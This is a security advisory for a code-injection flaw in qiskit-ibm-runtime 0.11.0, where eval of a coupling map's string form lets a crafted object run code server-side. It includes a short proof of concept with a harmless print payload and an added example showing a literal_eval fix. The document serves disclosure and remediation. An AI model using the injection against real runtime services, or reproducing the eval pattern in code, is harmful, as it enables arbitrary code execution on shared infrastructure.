Uncontrolled Recalculation of Data to Code ('Code Injection') Affecting qiskit-ibm-runtime package, versions [0.11.0,0.11.1)


Snyk CVSS score: 0.0 (low)
    Attack Complexity: High
    Scope: Changed

Threat Intelligence
    Exploit Maturity: Proof of concept

  • Snyk ID SNYK-PYTHON-QISKITIBMRUNTIME-6475237
  • published 21 Mar 2024
  • disclosed 20 Mar 2024
  • credit ihincks

Introduced: 20 Mar 2024

CVE: not available. CWE-627.

How to fix?

Upgrade qiskit-ibm-runtime to version 0.11.1 or higher.

Overview

qiskit-ibm-runtime is an IBM Quantum client for Qiskit Runtime.

Affected versions of this package are vulnerable to Uncontrolled Recalculation of Data to Code ('Code Injection') due to the use of the eval method in Options._get_program_inputs. An attacker can execute arbitrary code by supplying a specially crafted object that, when processed by eval, leads to code execution. Because Options are processed server-side, this potentially exposes runtime containers to arbitrary code injection.

PoC

from qiskit import QuantumCircuit, transpiler
from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler

# A CouplingMap subclass whose string form is Python source rather than a list of edges.
class BadActor(transpiler.CouplingMap):
    def __str__(self):
        return "print('external code')"

cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
# The affected Options._get_program_inputs passes the coupling map's string form to eval
# (see Overview), so the string returned above is executed.
options.simulator = dict(coupling_map=cmap)

bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()

with Session(service=service, backend="ibmq_qasm_simulator") as session:
    sampler = Sampler(session=session, options=options).run(bell)
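To show the unsafe pattern the Overview describes next to one hardened alternative, here is an added example that is not from the advisory or from qiskit-ibm-runtime and does not import qiskit: CouplingMap, Crafted, unsafe_program_inputs and safe_program_inputs are constructed stand-ins, and the eval-on-str(coupling_map) behaviour is assumed from the PoC.

```python
import ast

class CouplingMap:
    """Constructed stand-in for a coupling map: a list of [control, target] edges."""
    def __init__(self, edges):
        self.edges = [list(e) for e in edges]

    def __str__(self):
        return str(self.edges)

def unsafe_program_inputs(coupling_map):
    """Vulnerable pattern (assumed from the PoC): round-trip through str() and eval().

    Whatever __str__ returns is executed as Python, so a subclass that
    overrides __str__ controls the evaluated source."""
    return eval(str(coupling_map))

def safe_program_inputs(coupling_map):
    """Hardened version: parse the string as a literal only, then validate its shape.

    ast.literal_eval accepts only constants and container literals; any call,
    name lookup or attribute access makes it raise instead of executing."""
    text = str(coupling_map)
    try:
        edges = ast.literal_eval(text)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise ValueError(f"coupling_map is not a plain literal: {text!r}") from exc
    if not isinstance(edges, list) or not all(
        isinstance(e, (list, tuple)) and len(e) == 2
        and all(isinstance(q, int) and not isinstance(q, bool) for q in e)
        for e in edges
    ):
        raise ValueError("coupling_map must be a list of [int, int] edges")
    return [list(e) for e in edges]

class Crafted(CouplingMap):
    """Constructed object in the spirit of the PoC: its string form is an
    expression, not a list. len('abc') stands in for any code."""
    def __str__(self):
        return "len('abc')"

if __name__ == "__main__":
    honest = CouplingMap([(0, 1), (1, 2)])
    print(unsafe_program_inputs(honest), safe_program_inputs(honest))
    print(unsafe_program_inputs(Crafted([])))  # the expression was executed: 3
    try:
        safe_program_inputs(Crafted([]))
    except ValueError as err:
        print("rejected:", err)
```

A simpler mitigation is to never round-trip through str() at all: serialize the edge list directly (coupling_map.edges in this stand-in) and apply the same shape validation before it reaches the server side.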

References